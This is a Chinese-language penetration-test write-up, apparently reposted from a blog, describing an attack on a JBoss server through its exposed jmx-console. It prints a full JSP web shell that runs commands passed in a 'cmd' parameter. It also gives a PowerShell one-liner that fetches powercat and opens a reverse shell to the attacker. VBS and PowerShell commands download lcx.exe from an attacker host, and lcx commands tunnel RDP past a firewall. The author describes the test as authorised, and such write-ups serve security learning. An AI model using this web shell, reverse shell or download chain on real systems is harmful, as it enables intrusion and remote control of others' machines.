一.前言
最近做滲透測(cè)試中遇到一個(gè)jboss的站,在其中學(xué)到一些在乙方工作挺有用的技巧(這次測(cè)試是進(jìn)過(guò)授權(quán)測(cè)試)在次分享一下
二.信息收集
先通過(guò)namp進(jìn)行掃描,同時(shí)進(jìn)行目錄掃描,發(fā)現(xiàn)8080/jmx-console/,發(fā)現(xiàn)是jboss的站,百度到j(luò)boss可以部署war包getshell,訪問(wèn)http://xxxx:8080//jmx-console/
三.漏洞利用
全局搜索jboss.system,點(diǎn)擊進(jìn)入
站上
//gg.jsp <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %> <html> <head> <title>title> <meta http-equiv="Content-Type" content="text/html; charset=big5"> head> <body> <% Runtime runtime = Runtime.getRuntime(); Process process =null; String line=null; InputStream is =null; InputStreamReader isr=null; BufferedReader br =null; String ip=request.getParameter("cmd"); try { process =runtime.exec(ip); is = process.getInputStream(); isr=new InputStreamReader(is); br =new BufferedReader(isr); out.println("
"); while( (line = br.readLine()) != null ) { out.println(line); out.flush(); } out.println(""); is.close(); isr.close(); br.close(); } catch(IOException e ) { out.println(e); runtime.exit(1); } %> body> html> 我這里就用python 簡(jiǎn)單創(chuàng)建個(gè)ftp服務(wù)(這也是python的一個(gè)巧用)
python -m SimpleHTTPServer 8589
四.進(jìn)一步滲透
1.在獲得php shell的基礎(chǔ)上,我們需要一個(gè)真正的cmd shell,這樣有利于操作,進(jìn)過(guò)nmap掃描,發(fā)現(xiàn)是windows,我們可以通過(guò)powershell進(jìn)行shell反彈powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs echo Post.Send() >>download.vbs echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs echo aGet.Mode = 3 >>download.vbs echo aGet.Type = 1 >>download.vbs echo aGet.Open() >>download.vbs echo aGet.Write(Post.responseBody) >>download.vbs echo aGet.SaveToFile "C:WindowsTemp2.txt",2 >>download.vbs
powershell 下載代碼powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:WindowsTemp2.txt')
7.當(dāng)自己寫進(jìn)去了后,更名為exe執(zhí)行的時(shí)候,被殺了,最后又看了下任務(wù),才發(fā)現(xiàn)卡巴斯基,然后就一直被卡在這里8.lcx命令如下lcx 命令//被攻擊機(jī)器 lcx -slave 自己外網(wǎng)ip 51 內(nèi)網(wǎng)ip 3389 //攻擊機(jī)器 lcx.exe -listen 51 9090
由于防火墻限制,部分端口如3389無(wú)法通過(guò)防火墻,此時(shí)可以將該目標(biāo)主機(jī)的3389端口透?jìng)鞯椒阑饓υ试S的其他端口,如53端口.lcx -tran 53 目標(biāo)主機(jī)ip 3389
總結(jié)
雖然暫時(shí)沒(méi)有成功,但從中還是學(xué)到許多滲透知識(shí),也明白了實(shí)戰(zhàn)能提高許多技術(shù)。不足就是知識(shí)不夠,還需努力。
審核編輯 :李倩
-
漏洞
+關(guān)注
關(guān)注
0文章
205瀏覽量
15594 -
滲透
+關(guān)注
關(guān)注
0文章
21瀏覽量
6352 -
Shell
+關(guān)注
關(guān)注
1文章
371瀏覽量
23835
原文標(biāo)題:實(shí)戰(zhàn)|一次不完美的Jboss滲透
文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
相關(guān)推薦
不完美的伴侶機(jī)器人?
Linux環(huán)境下怎么安裝配置JBoss
讓STM32完美的處理字符串
循環(huán)充放電一次就是少一次壽命嗎?
一次波過(guò)程的等值電路

評(píng)論